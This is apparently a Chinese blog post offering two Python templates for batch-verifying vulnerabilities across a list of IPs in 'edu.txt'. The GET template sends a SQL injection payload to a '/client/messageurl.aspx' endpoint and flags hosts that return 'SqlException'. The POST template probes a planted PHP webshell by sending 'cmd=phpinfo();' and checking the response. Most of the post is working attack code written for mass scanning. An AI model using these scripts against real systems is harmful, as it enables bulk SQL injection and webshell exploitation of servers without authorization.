题记
安服可能都有批量挖洞的需求,这时候验证漏洞存不存在就显得尤为重要,可以加快我们的工作效率。因此我整理下get请求和post请求下不同的模板,我们用的时候改一下url链接就好。
Get批量脚本
把要检测的ip放在edu.txt中,把相关漏洞链接复制到url的位置,看漏洞响应情况加个if判断(不同漏洞页面响应情况不同,你想要更精准些就自己写个正则,我懒),然后python3 poc.py即可。
这是get请求。
import requests file = open('edu.txt','r') number = file.readlines() id=1 for i in number: i = i.rstrip() i = str(i) try: url = 'http://' + i + "/client/messageurl.aspx?user=%27%20and%20(select%20db_name())>0--&pwd=1" #print(url) r = requests.get(url, timeout=1) r.encoding = r.apparent_encoding HtmlText = r.text if 'SqlException' in HtmlText: print("第"+str(id)+"个漏洞网址:"+url) id=id+1 else: pass except: pass
效果图:
Post批量脚本
有时候我们需要post请求发送数据,上面那个模板就不行了。自己看着改,需要加cookie的时候就加上cookie。这里我测试的是木马。
import requests file = open('edu.txt','r') number = file.readlines() id=1 for i in number: i = i.rstrip() i = str(i) try: #这里修改目标路径 url = 'http://' + i + "/20mm85.php" #print("这里测试一下ip的流向:" + url) headers={ 'cookie':'', 'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)' } data={ 'cmd':'phpinfo();' } #values = {'name': 'admin', 'password': '123456'}; #data = urllib.urlencode(values); result=requests.post(url,headers=headers,data=data,timeout=1).content.decode('utf-8') if 'phpinfo' in result: print("第"+str(id)+"个漏洞网址:"+url) id=id+1 #print(url) #r = requests.get(url, timeout=1) #r.encoding = r.apparent_encoding #HtmlText = r.text #if 'SqlException' in HtmlText: # print("第"+str(id)+"个漏洞网址:"+url) # id=id+1 else: pass except: pass
效果截图: